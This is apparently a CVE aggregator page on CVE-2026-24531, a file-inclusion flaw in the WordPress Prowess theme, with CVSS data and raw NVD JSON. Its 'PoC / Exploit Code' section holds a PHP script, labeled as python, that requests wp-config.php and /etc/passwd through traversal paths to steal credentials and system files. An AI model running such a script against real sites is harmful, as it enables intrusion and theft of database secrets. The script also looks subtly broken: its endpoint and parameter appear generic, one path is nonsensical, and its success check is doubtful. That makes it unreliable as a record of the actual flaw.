Security Vulnerability Report
中文
CVE-2026-24531 CVSS 7.5 HIGH

CVE-2026-24531

Published: 2026-01-23 15:16:09
Last Modified: 2026-04-28 15:16:11

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion.This issue affects Prowess: from n/a through <= 2.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Prowess Theme <= 2.3
Prowess Theme from n/a through 2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2026-24531 PoC - Prowess Theme LFI // Target: WordPress Prowess Theme <= 2.3 $target = 'http://target-site.com/'; $theme_path = '/wp-content/themes/prowess/'; // Read sensitive files $files = array( '../../../wp-config.php', '../../../wp-config.php?param=/etc/passwd', '/etc/passwd', '../../../etc/passwd', '../wp-config.php' ); echo "CVE-2026-24531 LFI PoC\n"; echo "Target: $target\n\n"; foreach ($files as $file) { echo "Testing: $file\n"; $url = $target . $theme_path . '?file=' . urlencode($file); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strpos($response, '<?php') !== false) { echo "[+] VULNERABLE! Found: $file\n"; echo "Content preview:\n" . substr($response, 0, 500) . "\n\n"; } } // Example HTTP Request: // GET /wp-content/themes/prowess/?file=../../../wp-config.php HTTP/1.1 // Host: target-site.com ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24531", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:09.127", "lastModified": "2026-04-28T15:16:10.840", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion.This issue affects Prowess: from n/a through <= 2.3."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('Inclusión Remota de Ficheros PHP') en Select-Themes Prowess prowess permite la Inclusión Local de Ficheros PHP. Este problema afecta a Prowess: desde n/a hasta &lt;= 2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-2-3-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}